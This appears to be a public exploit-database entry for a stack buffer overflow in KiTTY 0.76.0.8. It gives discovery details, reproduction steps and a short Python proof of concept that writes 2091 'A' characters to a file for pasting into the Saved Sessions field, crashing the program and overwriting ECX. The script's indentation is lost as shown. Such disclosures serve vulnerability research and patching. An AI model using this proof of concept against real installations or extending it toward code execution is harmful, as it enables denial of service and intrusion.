Kitty version 0.76.0.8 suffers from a buffer overflow vulnerability.
3e2bfa45aa4308b003d19647b041b8d31a6ee476ab638d84af244829934d5f7c
# Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-06-08
# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md
# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe
# Tested Version: 0.76.0.8
# Vulnerability Type: Buffer Overflow
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: Kitty 0.76.0.8 Stack Buffer Overflow
# Steps to reproduce:
# 1. - Run the python script and it will create exploit.txt file.
# 3. - Kitty 0.76.0.8
# 4. - Sessions -> Save
# 5. - Paste the characters of txt to Saved/Sessions then click save
# 6. - Crashed
# Note: ECX Overwwrite
#!/usr/bin/python
exploit = 'A' * 2091
try:
file = open("exploit.txt","w")
file.write(exploit)
file.close()
print("POC is created")
except:
print("POC not created")